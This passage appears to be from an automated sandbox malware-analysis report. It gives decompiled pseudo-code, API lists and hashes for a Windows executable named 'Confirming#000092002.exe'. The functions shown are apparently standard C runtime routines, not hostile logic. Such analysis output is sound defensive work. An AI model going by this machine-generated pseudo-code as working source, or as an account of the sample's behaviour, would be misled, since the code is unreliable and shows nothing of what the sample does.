    					E00EA8B82( *((intOrPtr*)(_t45 + 0x15c)));
    					return E00EA8B82( *((intOrPtr*)(_t45 + 0x160)));
    				}
    				return _t18;
    			}

    APIs
      • Part of subcall function 00EABD11: _free.LIBCMT ref: 00EABD36
    • _free.LIBCMT ref: 00EABD97
      • Part of subcall function 00EA8B82: HeapFree.KERNEL32(00000000,00000000,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?), ref: 00EA8B98
      • Part of subcall function 00EA8B82: GetLastError.KERNEL32(?,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?,?), ref: 00EA8BAA
    • _free.LIBCMT ref: 00EABDA2
    • _free.LIBCMT ref: 00EABDAD
    • _free.LIBCMT ref: 00EABE01
    • _free.LIBCMT ref: 00EABE0C
    • _free.LIBCMT ref: 00EABE17
    • _free.LIBCMT ref: 00EABE22
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 525e5c658dd9c6b21af90f0a18bfdc04389eb2df5792fc6ff52ccae0de6d7f38
    • Instruction ID: 9a86bbfdf6d8dd19d477b7bb07bfdf6014ce1c7f97ed159503066f5c4b99027a
    • Opcode Fuzzy Hash: 525e5c658dd9c6b21af90f0a18bfdc04389eb2df5792fc6ff52ccae0de6d7f38
    • Instruction Fuzzy Hash: F5112E71540B04AADA20BBB0DC47FCB77DCEF0A710F946819B29ABE053DB65BA049760
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E00EA7C13(void* __ecx, intOrPtr _a4) {
    				signed int _v8;
    				_Unknown_base(*)()* _t8;
    				_Unknown_base(*)()* _t14;
    
    				_v8 = _v8 & 0x00000000;
    				_t8 =  &_v8;
    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
    				if(_t8 != 0) {
    					_t8 = GetProcAddress(_v8, "CorExitProcess");
    					_t14 = _t8;
    					if(_t14 != 0) {
    						 *0xeb1278(_a4);
    						_t8 =  *_t14();
    					}
    				}
    				if(_v8 != 0) {
    					return FreeLibrary(_v8);
    				}
    				return _t8;
    			}

    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00EA7BC5,?,?,00EA7B8D,?,00000000,?), ref: 00EA7C28
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EA7C3B
    • FreeLibrary.KERNEL32(00000000,?,?,00EA7BC5,?,?,00EA7B8D,?,00000000,?), ref: 00EA7C5E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: "G$CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1533591495
    • Opcode ID: 1038748533392559141607945d0ec97ae4ef887678ce251eb47f8e7b3028c698
    • Instruction ID: d436fea94645a6ab479f369ada441b937e02462542c7ad348a7743b58d847860
    • Opcode Fuzzy Hash: 1038748533392559141607945d0ec97ae4ef887678ce251eb47f8e7b3028c698
    • Instruction Fuzzy Hash: B6F08230541218FFDB11AB51DD19BDFBB79EF08769F1012A4EA41B1160CB718F04DB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E00EAD4C5(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v16;
    				char _v23;
    				char _v24;
    				void _v32;
    				signed int _v33;
    				signed char _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				char _v51;
    				void _v52;
    				long _v56;
    				char _v60;
    				intOrPtr _v68;
    				char _v72;
    				struct _OVERLAPPED* _v76;
    				signed char _v80;
    				signed int _v84;
    				signed int _v88;
    				char _v92;
    				intOrPtr _v96;
    				long _v100;
    				signed char* _v104;
    				signed char* _v108;
    				void* _v112;
    				intOrPtr _v116;
    				char _v120;
    				int _v124;
    				intOrPtr _v128;
    				struct _OVERLAPPED* _v132;
    				struct _OVERLAPPED* _v136;
    				struct _OVERLAPPED* _v140;
    				struct _OVERLAPPED* _v144;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t170;
    				signed int _t172;
    				int _t178;
    				intOrPtr _t183;
    				intOrPtr _t186;
    				void* _t188;
    				void* _t190;
    				long _t193;
    				void _t198;
    				signed char* _t202;
    				void* _t206;
    				struct _OVERLAPPED* _t211;
    				void* _t220;
    				long _t224;
    				intOrPtr _t225;
    				char _t227;
    				void* _t237;
    				signed int _t242;
    				intOrPtr _t245;
    				signed int _t248;
    				signed int _t249;
    				signed int _t251;
    				intOrPtr _t253;
    				void* _t259;
    				intOrPtr _t260;
    				signed int _t261;
    				signed char _t264;
    				intOrPtr _t267;
    				signed char* _t269;
    				signed int _t272;
    				signed int _t273;
    				signed int _t277;
    				signed int _t278;
    				intOrPtr _t279;
    				signed int _t280;
    				struct _OVERLAPPED* _t282;
    				struct _OVERLAPPED* _t284;
    				signed int _t285;
    				void* _t286;
    				void* _t287;
    
    				_t170 =  *0xeb9008; // 0x64e1d101
    				_v8 = _t170 ^ _t285;
    				_t172 = _a8;
    				_t264 = _t172 >> 6;
    				_t242 = (_t172 & 0x0000003f) * 0x38;
    				_t269 = _a12;
    				_v108 = _t269;
    				_v80 = _t264;
    				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0xfe2960 + _t264 * 4)) + 0x18));
    				_v44 = _t242;
    				_v96 = _a16 + _t269;
    				_t178 = GetConsoleOutputCP();
    				_t241 = 0;
    				_v124 = _t178;
    				E00EA70E3( &_v72, _t264, 0);
    				_t273 = 0;
    				_v92 = 0;
    				_v88 = 0;
    				_v84 = 0;
    				_t245 =  *((intOrPtr*)(_v68 + 8));
    				_v128 = _t245;
    				_v104 = _t269;
    				if(_t269 >= _v96) {
    					L48:
    					__eflags = _v60 - _t241;
    				} else {
    					while(1) {
    						_t248 = _v44;
    						_v51 =  *_t269;
    						_v76 = _t241;
    						_v40 = 1;
    						_t186 =  *((intOrPtr*)(0xfe2960 + _v80 * 4));
    						_v48 = _t186;
    						if(_t245 != 0xfde9) {
    							goto L19;
    						}
    						_t211 = _t241;
    						_t267 = _v48 + 0x2e + _t248;
    						_v116 = _t267;
    						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
    							_t211 =  &(_t211->Internal);
    							if(_t211 < 5) {
    								continue;
    							}
    							break;
    						}
    						_t264 = _v96 - _t269;
    						_v40 = _t211;
    						if(_t211 <= 0) {
    							_t72 = ( *_t269 & 0x000000ff) + 0xeb9760; // 0x0
    							_t253 =  *_t72 + 1;
    							_v48 = _t253;
    							__eflags = _t253 - _t264;
    							if(_t253 > _t264) {
    								__eflags = _t264;
    								if(_t264 <= 0) {
    									goto L40;
    								} else {
    									_t278 = _v44;
    									do {
    										 *((char*)( *((intOrPtr*)(0xfe2960 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
    										_t241 =  &(_t241->Internal);
    										__eflags = _t241 - _t264;
    									} while (_t241 < _t264);
    									goto L39;
    								}
    							} else {
    								_v144 = _t241;
    								__eflags = _t253 - 4;
    								_v140 = _t241;
    								_v56 = _t269;
    								_v40 = (_t253 == 4) + 1;
    								_t220 = E00EAC7FA( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
    								_t287 = _t286 + 0x10;
    								__eflags = _t220 - 0xffffffff;
    								if(_t220 == 0xffffffff) {
    									goto L48;
    								} else {
    									_t279 = _v48;
    									goto L18;
    								}
    							}
    						} else {
    							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0xeb9760)) + 1;
    							_v56 = _t224;
    							_t225 = _t224 - _v40;
    							_v48 = _t225;
    							if(_t225 > _t264) {
    								__eflags = _t264;
    								if(_t264 > 0) {
    									_t280 = _t248;
    									do {
    										_t227 =  *((intOrPtr*)(_t241 + _t269));
    										_t259 =  *((intOrPtr*)(0xfe2960 + _v80 * 4)) + _t280 + _t241;
    										_t241 =  &(_t241->Internal);
    										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
    										_t280 = _v44;
    										__eflags = _t241 - _t264;
    									} while (_t241 < _t264);
    									L39:
    									_t273 = _v88;
    								}
    								L40:
    								_t277 = _t273 + _t264;
    								__eflags = _t277;
    								L41:
    								__eflags = _v60;
    								_v88 = _t277;
    							} else {
    								_t264 = _v40;
    								_t282 = _t241;
    								_t260 = _v116;
    								do {
    									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
    									_t282 =  &(_t282->Internal);
    								} while (_t282 < _t264);
    								_t283 = _v48;
    								_t261 = _v44;
    								if(_v48 > 0) {
    									E00EA56D0( &_v16 + _t264, _t269, _t283);
    									_t261 = _v44;
    									_t286 = _t286 + 0xc;
    									_t264 = _v40;
    								}
    								_t272 = _v80;
    								_t284 = _t241;
    								do {
    									 *( *((intOrPtr*)(0xfe2960 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
    									_t284 =  &(_t284->Internal);
    								} while (_t284 < _t264);
    								_t269 = _v104;
    								_t279 = _v48;
    								_v120 =  &_v16;
    								_v136 = _t241;
    								_v132 = _t241;
    								_v40 = (_v56 == 4) + 1;
    								_t237 = E00EAC7FA( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
    								_t287 = _t286 + 0x10;
    								if(_t237 == 0xffffffff) {
    									goto L48;
    								} else {
    									L18:
    									_t269 = _t269 - 1 + _t279;
    									L27:
    									_t269 =  &(_t269[1]);
    									_v104 = _t269;
    									_t193 = E00EAB146(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
    									_t286 = _t287 + 0x20;
    									_v56 = _t193;
    									if(_t193 == 0) {
    										goto L48;
    									} else {
    										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
    											L47:
    											_v92 = GetLastError();
    											goto L48;
    										} else {
    											_t273 = _v84 - _v108 + _t269;
    											_v88 = _t273;
    											if(_v100 < _v56) {
    												goto L48;
    											} else {
    												if(_v51 != 0xa) {
    													L34:
    													if(_t269 >= _v96) {
    														goto L48;
    													} else {
    														_t245 = _v128;
    														continue;
    													}
    												} else {
    													_t198 = 0xd;
    													_v52 = _t198;
    													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
    														goto L47;
    													} else {
    														if(_v100 < 1) {
    															goto L48;
    														} else {
    															_v84 = _v84 + 1;
    															_t273 = _t273 + 1;
    															_v88 = _t273;
    															goto L34;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L49;
    						L19:
    						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
    						__eflags = _t264 & 0x00000004;
    						if((_t264 & 0x00000004) == 0) {
    							_v33 =  *_t269;
    							_t188 = E00EABE2D(_t264);
    							_t249 = _v33 & 0x000000ff;
    							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
    							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
    								_push(1);
    								_push(_t269);
    								goto L26;
    							} else {
    								_t100 =  &(_t269[1]); // 0x1
    								_t202 = _t100;
    								_v56 = _t202;
    								__eflags = _t202 - _v96;
    								if(_t202 >= _v96) {
    									_t264 = _v80;
    									_t251 = _v44;
    									_t241 = _v33;
    									 *((char*)(_t251 +  *((intOrPtr*)(0xfe2960 + _t264 * 4)) + 0x2e)) = _v33;
    									 *(_t251 +  *((intOrPtr*)(0xfe2960 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0xfe2960 + _t264 * 4)) + 0x2d) | 0x00000004;
    									_t277 = _t273 + 1;
    									goto L41;
    								} else {
    									_t206 = E00EA8D4C( &_v76, _t269, 2);
    									_t287 = _t286 + 0xc;
    									__eflags = _t206 - 0xffffffff;
    									if(_t206 == 0xffffffff) {
    										goto L48;
    									} else {
    										_t269 = _v56;
    										goto L27;
    									}
    								}
    							}
    						} else {
    							_t264 = _t264 & 0x000000fb;
    							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
    							_v23 =  *_t269;
    							_push(2);
    							 *(_t248 + _v48 + 0x2d) = _t264;
    							_push( &_v24);
    							L26:
    							_push( &_v76);
    							_t190 = E00EA8D4C();
    							_t287 = _t286 + 0xc;
    							__eflags = _t190 - 0xffffffff;
    							if(_t190 == 0xffffffff) {
    								goto L48;
    							} else {
    								goto L27;
    							}
    						}
    						goto L49;
    					}
    				}
    				L49:
    				if(__eflags != 0) {
    					_t183 = _v72;
    					_t165 = _t183 + 0x350;
    					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
    					__eflags =  *_t165;
    				}
    				__eflags = _v8 ^ _t285;
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				return E00EA403C(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
    			}
















































































    APIs
    • GetConsoleOutputCP.KERNEL32(00000000,?,?), ref: 00EAD50D
    • __fassign.LIBCMT ref: 00EAD6F2
    • __fassign.LIBCMT ref: 00EAD70F
    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EAD757
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EAD797
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EAD83F
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
    • String ID:
    • API String ID: 1735259414-0
    • Opcode ID: 365976987f0b67f918501e71225336cc3d65166a14fda347004bba85ef5cc07d
    • Instruction ID: 15085ca8cd7d475fdc5edaef968d96cb59f379557fe49cce197c5bbcb2bb7d9f
    • Opcode Fuzzy Hash: 365976987f0b67f918501e71225336cc3d65166a14fda347004bba85ef5cc07d
    • Instruction Fuzzy Hash: 34C18FB5D042588FCB15CFA8C8809EDBBF9FF4E314F28516AE856BB242D631AD45CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00EA5DDA(void* __ecx) {
    				void* _t4;
    				void* _t8;
    				void* _t11;
    				void* _t13;
    				void* _t14;
    				void* _t18;
    				void* _t23;
    				long _t24;
    				void* _t27;
    
    				_t13 = __ecx;
    				if( *0xeb9020 != 0xffffffff) {
    					_t24 = GetLastError();
    					_t11 = E00EA6F9D(_t13, __eflags,  *0xeb9020);
    					_t14 = _t23;
    					__eflags = _t11 - 0xffffffff;
    					if(_t11 == 0xffffffff) {
    						L5:
    						_t11 = 0;
    					} else {
    						__eflags = _t11;
    						if(__eflags == 0) {
    							_t4 = E00EA6FD8(_t14, __eflags,  *0xeb9020, 0xffffffff);
    							__eflags = _t4;
    							if(_t4 != 0) {
    								_push(0x28);
    								_t27 = E00EA8AC4();
    								_t18 = 1;
    								__eflags = _t27;
    								if(__eflags == 0) {
    									L8:
    									_t11 = 0;
    									E00EA6FD8(_t18, __eflags,  *0xeb9020, 0);
    								} else {
    									_t8 = E00EA6FD8(_t18, __eflags,  *0xeb9020, _t27);
    									_pop(_t18);
    									__eflags = _t8;
    									if(__eflags != 0) {
    										_t11 = _t27;
    										_t27 = 0;
    										__eflags = 0;
    									} else {
    										goto L8;
    									}
    								}
    								E00EA7188(_t27);
    							} else {
    								goto L5;
    							}
    						}
    					}
    					SetLastError(_t24);
    					return _t11;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetLastError.KERNEL32(?,?,00EA5DD1,00EA5516,00EA4B3F), ref: 00EA5DE8
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EA5DF6
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EA5E0F
    • SetLastError.KERNEL32(00000000,00EA5DD1,00EA5516,00EA4B3F), ref: 00EA5E61
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 807694bcca647d75093581e2b82abf889efcdf1e9fc91df3c5e419d60f4d6e75
    • Instruction ID: a79e3b4449ceea1e58c1113816c84336ecb0627c53ef7b89bd8e5bc5111ae741
    • Opcode Fuzzy Hash: 807694bcca647d75093581e2b82abf889efcdf1e9fc91df3c5e419d60f4d6e75
    • Instruction Fuzzy Hash: 6201F13760DB266EAB102EB57C856673AA8EB1F778730132AF2207C0E1EE113C059140
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E00EA5EBA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				signed int* _t52;
    				signed int _t53;
    				intOrPtr _t54;
    				signed int _t58;
    				signed int _t61;
    				intOrPtr _t71;
    				signed int _t75;
    				signed int _t79;
    				signed int _t81;
    				signed int _t84;
    				signed int _t85;
    				signed int _t97;
    				signed int* _t98;
    				signed char* _t101;
    				signed int _t107;
    				void* _t111;
    
    				_push(0x10);
    				_push(0xeb7098);
    				E00EA4730(__ebx, __edi, __esi);
    				_t75 = 0;
    				_t52 =  *(_t111 + 0x10);
    				_t81 = _t52[1];
    				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
    					L30:
    					_t53 = 0;
    					__eflags = 0;
    					goto L31;
    				} else {
    					_t97 = _t52[2];
    					if(_t97 != 0 ||  *_t52 < 0) {
    						_t84 =  *_t52;
    						_t107 =  *(_t111 + 0xc);
    						if(_t84 >= 0) {
    							_t107 = _t107 + 0xc + _t97;
    						}
    						 *(_t111 - 4) = _t75;
    						_t101 =  *(_t111 + 0x14);
    						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
    							L10:
    							_t54 =  *((intOrPtr*)(_t111 + 8));
    							__eflags = _t84 & 0x00000008;
    							if((_t84 & 0x00000008) == 0) {
    								__eflags =  *_t101 & 0x00000001;
    								if(( *_t101 & 0x00000001) == 0) {
    									_t84 =  *(_t54 + 0x18);
    									__eflags = _t101[0x18] - _t75;
    									if(_t101[0x18] != _t75) {
    										__eflags = _t84;
    										if(_t84 == 0) {
    											goto L32;
    										} else {
    											__eflags = _t107;
    											if(_t107 == 0) {
    												goto L32;
    											} else {
    												__eflags =  *_t101 & 0x00000004;
    												_t79 = 0;
    												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
    												__eflags = _t75;
    												 *(_t111 - 0x20) = _t75;
    												goto L29;
    											}
    										}
    									} else {
    										__eflags = _t84;
    										if(_t84 == 0) {
    											goto L32;
    										} else {
    											__eflags = _t107;
    											if(_t107 == 0) {
    												goto L32;
    											} else {
    												E00EA56D0(_t107, E00EA5496(_t84,  &(_t101[8])), _t101[0x14]);
    												goto L29;
    											}
    										}
    									}
    								} else {
    									__eflags =  *(_t54 + 0x18);
    									if( *(_t54 + 0x18) == 0) {
    										goto L32;
    									} else {
    										__eflags = _t107;
    										if(_t107 == 0) {
    											goto L32;
    										} else {
    											E00EA56D0(_t107,  *(_t54 + 0x18), _t101[0x14]);
    											__eflags = _t101[0x14] - 4;
    											if(_t101[0x14] == 4) {
    												__eflags =  *_t107;
    												if( *_t107 != 0) {
    													_push( &(_t101[8]));
    													_push( *_t107);
    													goto L21;
    												}
    											}
    											goto L29;
    										}
    									}
    								}
    							} else {
    								_t84 =  *(_t54 + 0x18);
    								goto L12;
    							}
    						} else {
    							_t71 =  *0xfe2740; // 0x0
    							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
    							if(_t71 == 0) {
    								goto L10;
    							} else {
    								 *0xeb1278();
    								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
    								L12:
    								if(_t84 == 0 || _t107 == 0) {
    									L32:
    									E00EA8A26(_t75, _t84, _t97, _t101, _t107);
    									asm("int3");
    									_push(8);
    									_push(0xeb70b8);
    									E00EA4730(_t75, _t101, _t107);
    									_t98 =  *(_t111 + 0x10);
    									_t85 =  *(_t111 + 0xc);
    									__eflags =  *_t98;
    									if(__eflags >= 0) {
    										_t103 = _t85 + 0xc + _t98[2];
    										__eflags = _t85 + 0xc + _t98[2];
    									} else {
    										_t103 = _t85;
    									}
    									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
    									_t108 =  *(_t111 + 0x14);
    									_push( *(_t111 + 0x14));
    									_push(_t98);
    									_push(_t85);
    									_t77 =  *((intOrPtr*)(_t111 + 8));
    									_push( *((intOrPtr*)(_t111 + 8)));
    									_t58 = E00EA5EBA(_t77, _t103, _t108, __eflags) - 1;
    									__eflags = _t58;
    									if(_t58 == 0) {
    										_t61 = E00EA6BC0(_t103, _t108[0x18], E00EA5496( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
    									} else {
    										_t61 = _t58 - 1;
    										__eflags = _t61;
    										if(_t61 == 0) {
    											_t61 = E00EA6BD0(_t103, _t108[0x18], E00EA5496( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
    										}
    									}
    									 *(_t111 - 4) = 0xfffffffe;
    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
    									return _t61;
    								} else {
    									 *_t107 = _t84;
    									_push( &(_t101[8]));
    									_push(_t84);
    									L21:
    									 *_t107 = E00EA5496();
    									L29:
    									 *(_t111 - 4) = 0xfffffffe;
    									_t53 = _t75;
    									L31:
    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
    									return _t53;
    								}
    							}
    						}
    					} else {
    						goto L30;
    					}
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: AdjustPointer
    • String ID: "G
    • API String ID: 1740715915-265486630
    • Opcode ID: 9ead9d24141c46eaa2e97ebeb830d16f3e9f7f048dbb4249b47a987e2de196f2
    • Instruction ID: aab262740b4f71102f6b12f39732001e160d9f7fd84339b758240ee0557837c7
    • Opcode Fuzzy Hash: 9ead9d24141c46eaa2e97ebeb830d16f3e9f7f048dbb4249b47a987e2de196f2
    • Instruction Fuzzy Hash: C951C27B605A02AFDB298F14D841BAA77E4EF4E314F245529F812AF691E731BC84C790
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EAA6B8(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
    				intOrPtr _t14;
    				intOrPtr _t15;
    				intOrPtr _t17;
    				intOrPtr _t36;
    				intOrPtr* _t38;
    				intOrPtr _t39;
    
    				_t38 = _a4;
    				if(_t38 != 0) {
    					__eflags =  *_t38;
    					if( *_t38 != 0) {
    						_t14 = E00EAB146(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
    						__eflags = _t14;
    						if(__eflags != 0) {
    							_t36 = _a8;
    							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
    							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
    								L10:
    								_t15 = E00EAB146(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
    								__eflags = _t15;
    								if(__eflags != 0) {
    									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
    									_t17 = 0;
    									__eflags = 0;
    								} else {
    									E00EA759E(GetLastError());
    									_t17 =  *((intOrPtr*)(E00EA75D4(__eflags)));
    								}
    								L13:
    								L14:
    								return _t17;
    							}
    							_t17 = E00EAA77F(_t36, _t14);
    							__eflags = _t17;
    							if(_t17 != 0) {
    								goto L13;
    							}
    							goto L10;
    						}
    						E00EA759E(GetLastError());
    						_t17 =  *((intOrPtr*)(E00EA75D4(__eflags)));
    						goto L14;
    					}
    					_t39 = _a8;
    					__eflags =  *((intOrPtr*)(_t39 + 0xc));
    					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
    						L5:
    						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
    						_t17 = 0;
    						 *((intOrPtr*)(_t39 + 0x10)) = 0;
    						goto L14;
    					}
    					_t17 = E00EAA77F(_t39, 1);
    					__eflags = _t17;
    					if(_t17 != 0) {
    						goto L14;
    					}
    					goto L5;
    				}
    				E00EAA7A6(_a8);
    				return 0;
    			}

    Strings
    • C:\Users\user\Desktop\Confirming#000092002.exe, xrefs: 00EAA6BD
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID:
    • String ID: C:\Users\user\Desktop\Confirming#000092002.exe
    • API String ID: 0-2125958311
    • Opcode ID: a706d353c1d13c2b17312458d68ec817ad061c4472b431ccff8e3740f06633d4
    • Instruction ID: 334785b7c3d3e31f4049179c9d71c103bb36bcd0315e8e7691f49773eeb2d8e3
    • Opcode Fuzzy Hash: a706d353c1d13c2b17312458d68ec817ad061c4472b431ccff8e3740f06633d4
    • Instruction Fuzzy Hash: C22180716043066FDB20AF718C81D6B77BCAF5A3687185626F855BF151EB20FC00C7A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EA6E42(void* __ecx, signed int* _a4, intOrPtr _a8) {
